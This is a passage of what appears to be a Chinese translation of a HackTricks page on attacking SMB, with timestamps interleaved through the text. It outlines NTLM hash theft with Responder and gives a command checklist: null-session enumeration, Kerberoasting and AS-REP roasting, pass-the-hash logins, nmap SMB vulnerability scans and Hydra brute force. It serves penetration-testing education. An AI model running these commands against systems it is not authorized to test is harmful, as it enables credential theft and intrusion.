2024-02-05 02:56:36 +00:00
### 使用MitMf的SMBTrap
2022-09-15 17:28:33 +00:00
2024-02-05 02:56:36 +00:00
![来源: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html ](<../.gitbook/assets/image (94 ).png>)
2022-09-15 17:28:33 +00:00
2024-02-05 02:56:36 +00:00
## NTLM窃取
2022-09-15 17:28:33 +00:00
2024-02-09 08:58:25 +00:00
类似于SMB陷阱, 通过在目标系统上植入恶意文件( 例如通过SMB) 可以引发SMB身份验证尝试, 从而允许使用工具如Responder拦截NetNTLMv2哈希。然后可以离线破解哈希或在[SMB中继攻击](pentesting-smb.md#smb-relay-attack)中使用。
2023-08-27 20:13:14 +00:00
2024-02-05 02:56:36 +00:00
[查看: ntlm\_theft ](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft )
2021-08-12 13:30:40 +00:00
2024-02-05 02:56:36 +00:00
## HackTricks自动命令
2021-10-18 11:21:18 +00:00
```
2023-12-26 21:49:09 +00:00
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out
2021-08-12 13:30:40 +00:00
2023-12-26 21:49:09 +00:00
Entry_1:
Name: Notes
Description: Notes for SMB
Note: |
While Port 139 is known technically as ‘ NBT over IP’ , Port 445 is ‘ SMB over IP’ . SMB stands for ‘ Server Message Blocks’ . Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
2023-08-03 19:12:22 +00:00
2023-12-26 21:49:09 +00:00
#These are the commands I run in order every time I see an open SMB port
2023-08-03 19:12:22 +00:00
2023-12-26 21:49:09 +00:00
With No Creds
2023-08-03 19:12:22 +00:00
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
crackmapexec smb {IP}
crackmapexec smb {IP} --pass-pol -u "" -p ""
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
getArch.py -target {IP}
2023-12-26 21:49:09 +00:00
With Creds
2023-08-03 19:12:22 +00:00
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
https://book.hacktricks.xyz/pentesting/pentesting-smb
2021-08-15 18:12:30 +00:00
2023-12-26 21:49:09 +00:00
Entry_2:
Name: Enum4Linux
Description: General SMB Scan
Command: enum4linux -a {IP}
2021-08-15 18:12:30 +00:00
2023-12-26 21:49:09 +00:00
Entry_3:
Name: Nmap SMB Scan 1
Description: SMB Vuln Scan With Nmap
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
2021-09-25 16:33:43 +00:00
2023-12-26 21:49:09 +00:00
Entry_4:
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
2023-08-03 19:12:22 +00:00
2023-12-26 21:49:09 +00:00
Entry_5:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
2022-04-28 16:01:33 +00:00
2023-12-26 21:49:09 +00:00
Entry_6:
Name: SMB/SMB2 139/445 consolesless mfs enumeration
Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' & & msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' & & msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' & & msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
2023-08-27 20:13:14 +00:00
2023-12-26 21:49:09 +00:00
```
2022-04-28 16:01:33 +00:00
< details >
2024-02-09 08:58:25 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, 成为专家< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS红队专家) < / strong > < / a > < strong > ! < / strong > < / summary >
2024-01-02 22:21:01 +00:00
2024-02-05 02:56:36 +00:00
其他支持HackTricks的方式:
2022-04-28 16:01:33 +00:00
2024-02-05 02:56:36 +00:00
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
2024-02-09 08:58:25 +00:00
* **加入** 💬 [**Discord群** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群** ](https://t.me/peass ) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )**。**
2024-02-05 02:56:36 +00:00
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >